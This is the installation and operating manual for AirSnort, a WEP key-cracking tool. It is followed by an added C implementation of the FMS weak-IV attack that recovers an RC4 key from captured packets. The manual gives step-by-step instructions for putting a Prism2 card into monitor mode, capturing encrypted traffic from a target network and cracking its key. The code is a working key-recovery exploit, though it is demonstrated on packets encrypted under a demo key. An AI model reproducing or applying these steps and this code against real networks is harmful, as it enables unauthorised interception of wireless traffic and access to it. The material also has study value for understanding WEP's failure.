- AirSnort Installation

AirSnort ONLY works with Prism2 cards! Assuming you have one of these
and a Linux installation, you must have the following available to
build AirSnort:

       * Kernel source code
       * PCMCIA CS package source code
       * linux-wlan-ng source code - you must have version 0.18-pre13
       * wlan-monitor patch
       * AirSnort source

All of these are available on our website.

To start, you must configure the kernel source code. This will link
the include directories in the source tree to the system-wide
directory, /usr/include. The kernel source code need not be compiled
or installed, but it must be the same version as the kernel that is
running; the running version can be determined with the command
'uname -a'. In addition, the running kernel needs to support loadable
modules, PCMCIA and netlink. If the running kernel does not support
these, you will need to compile and install a kernel from the source code.

The source code for PCMCIA CS must be installed, and it must be the
same version as the one you are running. To determine the version of
PCMCIA CS you are running, consult the output of the command
'cardmgr -V'. If you have the appropriate version, you need not compile
and install the source code, but you must still complete its
configuration step. All of the defaults are okay.

linux-wlan-ng is the kernel module that drives wlan cards. Only the
Prism2 driver supports raw packet capture, so it is the only one we
are interested in. The driver version listed above no longer ships
with raw packet capture enabled, but it can easily be added back with
the wlan-monitor patch. From the directory which contains the
linux-wlan-ng subdirectory, run the command

$ patch -p0 < wlan-monitor.patch

Then you must make and install the linux-wlan-ng driver. You must
[re]start the cardmgr, and you can then insert your wlan card. If
anything failed, consult the linux-wlan-ng documentation.  This is the
last prerequisite for AirSnort.

Assuming everything went well, AirSnort can now be built. This produces
two executables, 'capture' and 'crack'. If the build succeeded, the
section "Running AirSnort" is right for you. If anything failed,
(predictably) consult the appropriate package's documentation.

- Running AirSnort

The first thing to be done to crack 802.11b WEP is to get unmodified
encrypted packets. This requires putting the card in a mode in which
it gathers all packets indiscriminately, whether or not they are
addressed to it. This document calls that promiscuous mode (it is the
raw monitor mode that the wlan-monitor patch adds to the driver), and
it can be entered by running the script 'dopromisc.sh', which is in
the scripts directory. The channel in the script defaults to channel
6, but you may wish to change it if the network you are analyzing is
on a different channel.

Once the card is in promiscuous mode, you can run 'capture'. Its
parameters are simple: the optional -c switch presents a curses
display of its progress, updated every second, and the required
parameter is a filename, where the captured packets are stored. If you
are running capture in curses mode, the most important counter is
"Interesting Packets". An interesting packet is one in which the
second byte of the IV is 0xFF (the full test is given in "Capture
Details").

At intervals, you will probably wish to try to crack the password with
the data you have gathered. You can simply run the command 'crack' on
the file generated by capture. It is intended that capture be run in
one terminal and crack in another, once enough packets have been
gathered.

The number of interesting packets needed to perform a successful crack
depends on two things: luck and key length. Assuming that luck is on
your side, the key length is the only important factor. For a key
length of 128 bits (13 secret key bytes), this translates to about
1500 packets. For other key lengths, assume 115 packets per byte of
the secret key.

The only parameter to the crack program is the breadth of the tree
search. For a discussion of the algorithm, and how it affects runtime,
and statistics, see the section "AirSnort Theory."

In any case, if the crack program believes it has a correct password,
it checks the checksum of a random packet decrypted under that
password. If this succeeds, the correct password is printed in ASCII
and hex. If it fails, an error message is printed, which will soon
become painfully familiar to anyone who uses AirSnort for any extended
period of time.

- Capture Details

Capture uses the Linux netlink interface. If the device on the other
end is in the correct mode, it simply opens it and begins gathering
data. The packets go through two filters. First, non-encrypted packets
are filtered out. Then, among the encrypted packets, those that are
useless to the attack are discarded.

To distinguish encrypted and non-encrypted packets, capture examines
the first byte of the frame body. Every unencrypted data frame begins
with the SNAP header, whose first byte is 0xAA, so all packets whose
first byte is 0xAA are dropped. This is a heuristic rather than an
exact test: an encrypted body also starts with 0xAA about one time in
256, and such packets are lost. The same known first plaintext byte
is what gives the attack its known first keystream byte (ciphertext
byte XOR 0xAA).

Useful packets are those whose IV has the following property: the
first byte is three greater than the index (counting from zero) of one
of the bytes of the secret key. For 128-bit encryption, with 13 secret
key bytes, this means a number from 3 to 15. The second byte must be
255, and the third byte can have any value. This means that for every
byte of the key there are 256 weak IVs.

When every weak IV has been gathered (13 key bytes * 256 = 3328
packets), there is no point in continuing the capture process. In
reality, it takes somewhat fewer packets than this.

- Cracking Details

When executing the cracking operation, crack reads in the packets from
the output file produced by capture. Since capture appends to this
file, the examined data may come from several capture sessions. In
any case, crack performs a partial key search over the given data,
recovering the key one byte at a time from the votes cast by the weak
IVs for that byte. Since it is a probabilistic attack, the best guess
may not be the right one, so, with limited captured data and enough
CPU power, you can perform more exhaustive searches. By setting the
breadth parameter, you can tell crack to also follow "worse" guesses
for each byte. It is not suggested that you specify a breadth of more
than three or four, as the search grows exponentially with it.
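The two mechanisms described in "Capture Details" and "Cracking Details" above, as an added example in C that is not AirSnort's own code: capture's weak-IV test, the first-keystream-byte recovery from the 0xAA SNAP byte, and the per-key-byte FMS (Fluhrer, Mantin and Shamir) vote that crack is built on, with a breadth-1 search (most-voted guess per byte, no backtracking). The 13-byte key "AirSnort-Demo", the function names and the generated "captured" packets are all assumptions made here; the packets are produced by encrypting under that key rather than sniffed. A self-check uses the real key to pick out the IVs for which the vote is provably correct, something the real crack program cannot do since it does not have the key.

```c
/* Added example, not AirSnort's own code: capture's weak-IV filter and crack's
 * FMS vote, run over constructed packets encrypted under a constructed key. */
#include <stdint.h>
#include <string.h>

#define KEY_BYTES 13      /* 128-bit WEP: 3-byte IV + 13 secret key bytes */
#define SNAP_DSAP 0xAA    /* first plaintext byte of every data frame body */

static const uint8_t DEMO_KEY[KEY_BYTES + 1] = "AirSnort-Demo";  /* constructed */

/* Index A of the secret key byte a weak IV (A+3, 255, X) attacks, or -1 if
 * not weak. With 13 key bytes iv[0] runs 3..15: 13 * 256 = 3328 weak IVs. */
static int weak_iv_key_index(const uint8_t iv[3], int key_bytes)
{
    if (iv[1] != 255 || iv[0] < 3 || iv[0] >= key_bytes + 3) return -1;
    return iv[0] - 3;
}

/* RC4 KSA over k = IV||secret (16 bytes), stopped after `steps` rounds (256 =
 * full KSA); returns the final j. Self-check hook: if `ok` is non-NULL it is
 * cleared when a round after the first two touches S[0] or S[1], or a round
 * after round a+3 touches S[a+3]; under that condition an FMS vote on secret
 * byte `a` is provably right (an attacker, lacking the key, cannot test it). */
static uint8_t rc4_ksa(const uint8_t k[16], int steps, uint8_t s[256], int a, int *ok)
{
    uint8_t j = 0;
    for (int i = 0; i < 256; i++) s[i] = (uint8_t)i;
    for (int i = 0; i < steps; i++) {
        j = (uint8_t)(j + s[i] + k[i % 16]);
        if (ok && ((i >= 2 && j <= 1) || (i > a + 3 && j == a + 3))) *ok = 0;
        uint8_t t = s[i]; s[i] = s[j]; s[j] = t;
    }
    return j;
}

/* Ciphertext byte a station sends under `key` with weak IV (a+3, 255, x): the
 * first RC4 keystream byte XOR 0xAA. Also fills k = IV||key for the caller. */
static uint8_t weak_iv_cipher_byte(const uint8_t key[KEY_BYTES], int a, int x, uint8_t k[16])
{
    uint8_t s[256];
    k[0] = (uint8_t)(a + 3); k[1] = 255; k[2] = (uint8_t)x;
    memcpy(k + 3, key, KEY_BYTES);
    rc4_ksa(k, 256, s, 0, NULL);
    uint8_t j = s[1], t = s[1]; s[1] = s[j]; s[j] = t;        /* PRGA, i = 1 */
    return s[(uint8_t)(s[1] + s[j])] ^ SNAP_DSAP;
}

/* One FMS vote for secret byte A from the IV plus the A bytes recovered so far
 * (known[]). Returns -1 when the IV is not "resolved" (S[0] or S[1] moved). */
static int fms_vote(const uint8_t known[16], int a, uint8_t cipher_byte)
{
    uint8_t s[256], j = rc4_ksa(known, a + 3, s, 0, NULL);
    if (s[0] != a + 3 || s[1] != 0) return -1;
    uint8_t out = cipher_byte ^ SNAP_DSAP;                    /* keystream byte 1 */
    int idx = 0;
    while (s[idx] != out) idx++;                              /* S is a permutation */
    return (uint8_t)(idx - j - s[a + 3]);
}

/* crack with breadth 1: most-voted guess per byte, then extend the prefix.
 * Returns how many recovered bytes match key[]. Success is probabilistic:
 * only about 5% of the 256 weak IVs per byte vote for the right value. */
static int fms_recover(const uint8_t key[KEY_BYTES], uint8_t out[KEY_BYTES])
{
    uint8_t real[16], known[16] = {0};
    int correct = 0;
    for (int a = 0; a < KEY_BYTES; a++) {
        int votes[256] = {0};
        for (int x = 0; x < 256; x++) {
            uint8_t c = weak_iv_cipher_byte(key, a, x, real);  /* sniffed byte */
            memcpy(known, real, 3);                            /* IV is public */
            int g = fms_vote(known, a, c);
            if (g >= 0) votes[g]++;
        }
        int best = 0;
        for (int v = 1; v < 256; v++) if (votes[v] > votes[best]) best = v;
        out[a] = known[a + 3] = (uint8_t)best;
        correct += out[a] == key[a];
    }
    return correct;
}

/* Self-check: number of weak IVs for `key` that meet rc4_ksa's provable
 * condition, or -1 if any of them voted wrongly (a bug in fms_vote). */
static int fms_selfcheck(const uint8_t key[KEY_BYTES])
{
    uint8_t k[16], s[256];
    int hits = 0;
    for (int a = 0; a < KEY_BYTES; a++)
        for (int x = 0; x < 256; x++) {
            uint8_t c = weak_iv_cipher_byte(key, a, x, k);
            int ok = 1;
            rc4_ksa(k, 256, s, a, &ok);
            if (!ok) continue;
            hits++;
            if (fms_vote(k, a, c) != key[a]) return -1;
        }
    return hits;
}
```

To drive it by hand, add a main that calls fms_recover(DEMO_KEY, buf) and prints buf next to DEMO_KEY, and fms_selfcheck(DEMO_KEY) to see how many of the 3328 weak IVs were provably resolved. The recovered key will usually, but not always, match: that is the "luck" in the packet-count estimate above, and the reason crack offers a breadth parameter.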

The paper describing the attack is linked from our website.
